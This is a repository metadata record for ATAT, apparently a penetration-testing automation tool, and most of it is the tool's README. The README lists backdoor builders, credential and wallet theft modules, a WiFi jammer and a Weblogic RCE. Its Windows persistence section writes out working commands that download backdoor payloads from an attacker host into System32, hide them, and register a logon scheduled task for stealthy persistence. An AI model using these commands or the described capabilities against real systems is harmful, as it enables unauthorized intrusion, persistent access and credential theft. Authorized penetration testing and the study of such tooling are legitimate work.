{"id":13681522,"url":"https://github.com/ll3N1GmAll/ATAT","last_synced_at":"2025-04-30T03:31:47.347Z","repository":{"id":44173440,"uuid":"125772627","full_name":"ll3N1GmAll/ATAT","owner":"ll3N1GmAll","description":"Attack Team Automation Tool - for automating penetration testing operations with industry standard tools.","archived":false,"fork":false,"pushed_at":"2023-12-04T05:43:26.000Z","size":20698,"stargazers_count":33,"open_issues_count":0,"forks_count":5,"subscribers_count":3,"default_branch":"master","last_synced_at":"2024-11-12T00:36:44.827Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ll3N1GmAll.png","metadata":{"files":{"readme":"README.txt","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-03-18T22:16:15.000Z","updated_at":"2024-08-16T17:01:25.000Z","dependencies_parsed_at":"2024-01-14T15:25:58.086Z","dependency_job_id":"a6a6ed66-9cdf-4fc5-8536-c7d8aa9acced","html_url":"https://github.com/ll3N1GmAll/ATAT","commit_stats":{"total_commits":375,"total_committers":2,"mean_commits":187.5,"dds":"0.026666666666666616","last_synced_commit":"6b5b674d3f2b8450966c456a5d68ca4ce53ebe02"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ll3N1GmAll%2FATAT/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ll3N1GmAll","download_url":"https://codeload.github.com/ll3N1GmAll/ATAT/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251635359,"owners_count":21619208,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-02T13:01:31.857Z","updated_at":"2025-04-30T03:31:42.335Z","avatar_url":"https://github.com/ll3N1GmAll.png","language":"Shell","funding_links":[],"categories":["Shell"],"sub_categories":[],"readme":"***RTFM***RTFM***RTFM***RTFM***\n\nRun all dependency checker options to install all necessary tools before submitting any issues!\n\n# ATAT\nAttack Team Automation Tool for automating penetration testing operations. \n\nInterface and concept based on ezsploit by rand0m1ze. \nDurandal backdoor builder created by Travis Weathers (Skysploit); C code updated by ll3N1GmAll for newer gcc-mingw-w64-i686 compiler compatibility.\n\nv1.9.5\nAdded support for Hashcat GPU cracking\nAdded support for SpiderLabs' Spray password spray utility for SMB, OWA, Lync, Cisco VPN\nAdded support for BeRoot (Installation only at present; automation coming soon...)\nAdded support for GhostPack C# tools from SpecterOps (tool acquisition and setup only; full usage and autiomation features coming soon..)\nAdded support for Powershell wireless credential dumper\nAdded support for LaZagne credential harvester\nAdded support for LinEnum *nix Privilege Escalation checks\nAdded support for Bashark Post Exploitation Framework\nAdded support for Pupy Cross Platform Post Exploitation Framework\nAdded support for changeme Default Credential Checker\nAdded support for parsing Nmap output to feed SSLScan\nAdded Automated File Push and Exfiltration support\nAdded support for Bloodhound\nAdded support for HostAPD-WPE, Asleap, John the Ripper, \u0026 Airgeddon Integration,\nAdded Powershell Empire \u0026 DeathStar Integration, (PSE support downgraded to BETA until PSE 3 release integration)\nAdded support for Apache Struts/Tomcat/Etc. exploits,\nAdded support for Java JMX exploitation,\nAdded support for Java RMI exploitation,\nAdded support for linux post exploitation,\nAdded support for load balancer detection,\nAdded support for SSLScan (automated via masscan results),\nAdded support for Masscan of all TCP ports (informs SSLScan),\nAdded Android persistent reverse Meterpreter APK builder,\nAdded DBD persistent backdoor builder by Skysploit with enhanced persistence instructions,\nAdded dependency checker by Skysploit,\nAdded fully automated cross-platform MSF Post Exploitation on all sessions acquired for the following post ex activities:\n- enumerate hosts\n- dump cached domain creds\n- verify if you are on a vm\n- group policy preferences (dump local admin creds if pushed via GPO)\n- steal SVN creds (code repository)\n- steal scp creds\n- enumerate internal sites the user visits\n- all apps installed on target\n- Chrome, dump cookies, and saved creds\n- IE, dump cookies, and saved creds\n- Firefox, dump cookies, and saved creds\n- grab RDP sessions\n- grab local settings and local accounts\n- dumps WPA PSK \u0026 WEP passwords\n- dumps passwords on the local windows system including domain accounts\n- dump .ssh directory for known hosts\n- gather OS environment variables\n- dump /etc/shadow\n- dump user list plus bash/mysql/vim/lastlog/sudoers history\n- enum packages, services, mounts, user list, bash\n- check for AV, rootkit, HIDS/HIPS, firewalls, etc\n- dump IPTables, interfaces, wifi info, open ports\n- collect config files for commonly installed apps and services\n- grab arp table from target\n- enumerate the domain, domain users, and domain tokens\n- grab the host file\n- dump logged on users\n- dump MS product keys\n- steal VNC creds\n- enumerate services \u0026 shares on target\n- steal SNMP inforamtion\n- dump DNS cache\n- steal GPG credentials/certificates\n- grab the history of mounted USB devices\n- assess the target and suggest local exploits for privilege escalation or other operations\n- geolocate targets\n- grab credentials from just about anything imaginable including LastPass, Jenkins, Jboss, irssi, gpg, pgpass, pidgin, etc. etc. (the list grows constantly)\n- steal Bitcoin Wallet\n- Bitlocker Master Key (FVEK) Extraction\n- and a ton more!\n\n!!NOT RECOMMENDED!!--- INSTRUCTIONS TO RUN THIS FROM /home/\u003cprofile\u003e/ instead of running as root (Doing this will break Empire \u0026 DeathStar functionality as well as some Wireless Attacks functionality)---\nThe ATAT folder must be duplicated in /root \u0026 ~/ to run properly unless you are on Kali (logged in as root) or you are running\nanother distro logged in as root (duplicating this folder only needs to be done once and does not need to be updated ever).\nYou then do not have to run the script from /root if you place one copy of the ATAT folder in ~/ and one copy in /root.\nPlacing a copy of the ATAT folder in /root/ in this circumstance is only so you have the TXT files \naccessible by ATAT when it run as sudo. Then you simply run ATAT via sudo ./ATAT.sh from ~/ATAT.\nAll targets and/or ports must be added into their respective TXT files in /root/ as referenced above and detailed below.\nAdding your targets/ports to the TXT files in ~/ATAT will not work under this setup\n*You can (and should) have the ATAT folder in /root only if you wish; and you can run it from there disregarding all of these instructions.*\n\n**ParrotOS Users (and any distros using the firejail sandbox):**\nYou must navigate to /root/ATAT/ in a $ (non-root) terminal prompt. Then launch ATAT with \"sudo ./ATAT.sh\". Otherwise, firejail will break functionality. Launching in this manner resolves all firejail issues that I know of.\n\nusage:\nchmod +x ~/ATAT/ATAT.sh\ncd ATAT\nsudo ./ATAT.sh\n\nYou MUST load your PORTS or IPs into their appropriate TXT files for options listed below to work! (one per line)\n\nOPTION Multi-Target:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Port:\n/root/ATAT/MSF_target_ports.txt\n\nOPTION Multi-Port Auxiliary:\n/root/ATAT/MSF_AUX_target_ports.txt\n\nOPTION Multi-Target Struts \u0026 Multi-Target Tomcat:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi_target Java JMX \u0026 Multi-Target Java RMI:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Target SNMP Enumeration:\n/root/ATAT/MSF_targets.txt\n\nOPTION Multi-Target Load Balancer Detection:\n/root/ATAT/MSF_targets.txt\nResults output to screen and the ATAT folder in LBD_Results.txt.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Multi-Target SSLScan:\n~/ATAT/~SSLScan_masscan_results.txt \nTargets can be entered as just IPs/URLs for scanning on the default port 443; or you can enter colon delimited lists to specify the port to scan each target on as follows:\n1.2.3.4:22\n1.2.3.4:8443\n1.3.4.5:990\n1.3.4.5:547\nResults output to screen and the ATAT folder in SSLScan_Results.txt. All output is further processed and grouped into the following categories:\nRC4 findings in rc4.txt\nSSLv2 findings in sslv2.txt\nHeartbleed Findings in heartbleed_targets.txt\nFreak vuln findings in freak.txt\nWeak Cipher Findings in weak_ciphers.txt\nExpired Certificate Findings in expired_certs.txt\nSSL Certificate Details in ssl_certs.txt\nMasscan results also output to ~SSLScan_masscan_results.txt. This file contains all targets and discovered ports colon delimited one per line as above.\nSSLScan can be run automatically after running masscan to check for SSL issues on all discovered ports on every host in scope effortlessly.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Masscan All TCP Ports:\n/root/ATAT/MSF_targets.txt\nThis masscans all TCP ports for all targets at a reasonable rate (--rate 1000)\nResults output to screen and the ATAT folder in Open_Ports.txt.\nMasscan results also output to ~SSLScan_masscan_results.txt. This file contains all targets and discovered ports colon delimited one per line as follows:\n1.2.3.4:22\n1.2.3.4:8443\n1.3.4.5:990\n1.3.4.5:547\nSSLScan can be run automatically after running masscan to check for SSL issues on all discovered ports on every host in scope effortlessly.\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS SCANS' RESULTS\n\nOPTION Dependency Checker:\nDependencies option will attempt to install the required dependencies for ATAT. DBD Installer option must be run on your attacker box in order to receive DBD reverse shells.\nPowershell Empire \u0026 DeathStar Option Should Only Be Run If You Are Logged In As root!!\n\nOPTION Persistence:\nPLEASE DO NOT submit payloads generated to virustotal or any other online scanner!!\nDBD reverse shells will self heal a dropped connection in 10 minute intervals. If the connection is killed on either end or is lost for any reason, the connection will reconnect after a 10 minute period. All sessions are 128bit AES encrypted.\n\nWINDOWS:\nATAT creates a taskmgnt.txt \u0026 winmgnt.txt for Windows DBD builder option payloads and places them in the /var/www/html/ directory before starting Apache on the attacker's machine (to host the payloads for access by the target machines). Both of these TXT files must be converted to EXE format once they have been transmitted to the target. Taskmgnt(nominally obfuscated PSEXEC) can be used to execute the winmgnt (DBD backdoor) so it is executed by a MS signed binary for more stealth/evasion. DBD itself is not currently flagged by any AV; but sometimes it is necessary to have your EXE run by a MS signed binary.\nWindows deployment instructions for reboot persistence:\nOption \"DBD Reboot Persistence Generator - Windows\" will create the following BAT file with all of these steps and places it here: ~/ATAT/DBD_reboot.bat (You must have a SYSTEM shell, upload the BAT file to the %WINDIR%\\System32\\ directory, and run DBD_reboot.bat from the same directory)\nNow move the \"taskmgnt.txt\" \u0026 \"winmgnt.txt\" files to the target, rename \u0026 hide them, then launch backdoor with MS signed ofuscated PsExec.\nWhile this backdoor is self healing; it will not auto start at reboot. To get your shell back after a reboot, enter the following on the target (one command per line):\n\npowershell (new-object System.Net.WebClient).DownloadFile('http://\u003cATTACKER_IPADDRESS\u003e/winmgnt.txt','%WINDIR%\\System32\\winmgnt.exe')\npowershell (new-object System.Net.WebClient).DownloadFile('http://\u003cATTACKER_IPADDRESS\u003e/taskmgnt.txt','%WINDIR%\\System32\\taskmgnt.exe')\nattrib +H +S \\\"%WINDIR%\\System32\\winmgnt.exe\\\"\nattrib +H +S \\\"%WINDIR%\\System32\\taskmgnt.exe\\\"\n%WINDIR%\\System32\\taskmgnt.exe -i -d -s /accepteula %WINDIR%\\System32\\winmgnt.exe\nschtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr \\\"%WINDIR%\\System32\\winmgnt.exe\\\"\n\n*NIX:\nATAT creates a 'dbd' binary for *nix DBD builder option payloads and places it in the /var/www/html/ directory. \n\nFor post exploitation once you acquire sessions via ATAT,\n\nMETHOD 1: \nLaunch your listener with menu option 2. ATAT will intelligently detect the appropriate post modules to run against each session you receive.  However, due to a bug in the MSF AutoRunScript feature you must do the following: From your listener window, after all of your sessions are in (after your attacks have completed) hit enter to drop down to your msf expoit(multi/handler)\u003e prompt and then enter the following command without double quotes: \"resource '/root/ATAT/ATAT_multi_post.rc'\" Check your loot files in /root/.msf4/loot/\n\nMETHOD 2:\nThis will be updated once the aforementioned feature has been fixed by Rapid7.\n\nOPTION Empire \u0026 DeathStar:\nTHIS SECTION ONLY WORKS FROM THE /root/ CONTEXT!!\nIF YOU'RE NOT LOGGED IN AS root, DO NOT USE THESE OPTIONS!!\nEmpire \u0026 DeathStar MUST be installed in /root/!!\nOnly Launch DeathStar (Step 2) If Your Goal Is To Automate Domain Admin Credential Acquisition\n\nStep 1 must br run initially; after that you need to open another ATAT instance in a separate window and launch Step 2 to use DeathStar for domain admin credential acquisition automation. Run Step 3 to get the auth token for PSE's REST API; this is required for all other PSE options to work..\nStep 3 MUST be run once (and only once for a single PSE install; meaning you only need to run it again if you uninstall/reinstall, or you are using ATAT's PSE options to hit a PSE install on a separate machine). This step grabs the permanent auth token for the PSE REST API. You must use the temporary auth token displayed in the PSE console at startup to run this process. After this step you will not longer need to worry about the API auth token (this is stored in plaintext in your ATAT directory, delete ~/ATAT/PSE_perm_token.txt after your operation and re-run step 3 at the begninning of each operation to enhance opsec).\nPost exploitation features are a work in progress!\nBetter support and information for stagers will be provided as support for them grows.\n\nOPTION Wireless Attacks:\n1) Remove Wireless NIC from Network Manager - Removes the NIC you wish to use in a HostAPD-WPE attack from being managed by NetworkManager. This is essential for the attack to work.\n2) Reset Wireless NIC for Network Manager Usage - Allows NetworkManager to manage your wireless NIC after your attack is complete. This allows you to join wireless networks and operate the wireless NIC normally.\n3) HostAPD-WPE Enterprise WiFi Fake RADIUS Server Attack - Performs HostAPD-WPE attack to capture enterprise WPA credentials for cracking with Asleap option.\nThe RTL8187 or Alfa AWUS036H is, sadly, NOT supported. Also, your wireless chipset is likely not supported by HostAPD-WPE if you receive this error:\nConfiguration file: /etc/hostapd-wpe/hostapd-wpe2.conf\nnl80211: Could not configure driver mode\nnl80211: deinit ifname=wlan0 disabled_11b_rates=0 \nnl80211 driver initialization failed. \nwlan0: interface state UNINITIALIZED-\u003eDISABLED \nwlan0: AP-DISABLED \nhostapd_free_hapd_data: Interface wlan0 wasn't started\n\n4) Airgeddon - Launch airgeddon wireless script by v1s1t0r\n5) Multi-Target Asleap Attack - Perform dictionary attack against all users captured by the HostAPD-WPE attack. (better for fewer targets because usernames aren't paired with passwords in the output file)\nOUTPUT FILES APPEND DATA DUE TO THE NATURE OF THESE LOOPED OPERATIONS; THEREFORE, ALL OUTPUT FILES MUST BE DELETED OR CLEANED OUT PERIODICALLY TO GET RID OF PREVIOUS OPERATION'S RESULTS\n6) Multi-Target John The Ripper Attack - Perform dictionary attack against all users captured by the HostAPD-WPE attack.\n7) WiFi Jammer - *This Attack Is ILLEGAL If Not Conducted In A Controlled Environment That Is Free Of Networks That Are Not In Scope!! Use Responsibly \u0026 With Great Caution!* This is a an automated deauth attack that detects all access points \u0026 clients in range. This attack will hold down the 'user defined number' of closest clients indefinitely. A Yagi is recommended for long range, more percise targeting.\n\nOPTION Data Exfiltration:\n1) Push File To Target with SCP - Creds Required - Creates SCP syntax for pushing files to a *nix machine you have valid credentials to.\n2) Data Exfiltration - Creates Meterpreter syntax for downloading files from a target\n3) Push File To Target with PSH / Meterpreter - Creates meterpreter and powershell syntax for pushing files up to a target. PSH method starts Apache and provides a powershell command to run on your target that will download whatever file specified from your attacker machine. MSF method creates meterpreter syntx for uploading a specified file to your target at whatever location you specify.\n4) Wireless Password Stealer - Creates powershell syntax to dump all wireless passwords in plaintext; admin rights required.\n5) Windows 64 bit Credenital \u0026 Loot Harvester - Uses an obfuscated version of the excellent LaZagne Project (https://github.com/AlessandroZ/LaZagne) to steal nearly every conceivable password/private key/etc. from a target machine.\n6) Windows 32 bit Credenital \u0026 Loot Harvester - Uses an obfuscated version of the excellent LaZagne Project (https://github.com/AlessandroZ/LaZagne) to steal nearly every conceivable password/private key/etc. from a target machine.\n\nOPTION changeme Default Credential Checker:\nA default credential scanner by ztgrace (https://github.com/ztgrace/changeme)\n\nOPTION Imperial Research Laboratory:\n1) Weblogic Java Deserialization RCE - This proof of concept code will demonstrate the ability to run a ping command on the intended targets via exploitation of a Weblogic java deserialization remote code execution vulnerability. It will open a window with tcpdump running to receive the pings from each intended target. It will then open 1 window at a time for each target on your MSF_targets.txt list. These windows will attempt to ecploit the target and then close themselves once the attack has completed. Each target will be attacked in this manner. Any successful attacks will result in a ping from one of your targets showing up in the initial tcpdump window that opens and remains open. This is your indicator that the target is vulnerable. This attack should be run a few times to make sure the targets are not vunlerable. The exploit does not always trigger successfully the first couple of times.\n\nOPTION Hashcat Password Recovery:\nThis is for 64 bit machines only. The dictionary attacks automatically use the OneRuleToRuleThemAll rules set. There must be NO spaces in your file name \u0026 path when entering the full paths and file names in for your hash files, dictionary files, and output files.\nRun The \"Hashcat Install\" From The Dependency Checker BEFORE Using This Option!\nUsernames \u0026 Hashes Option Works For pwdump Type Output With Usernames Present In Dump File. \nCrack with \"Hashes Only\" Options Whenever Possible For Greatly Increased Speed. \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fll3N1GmAll%2FATAT","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fll3N1GmAll%2FATAT","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fll3N1GmAll%2FATAT/lists"}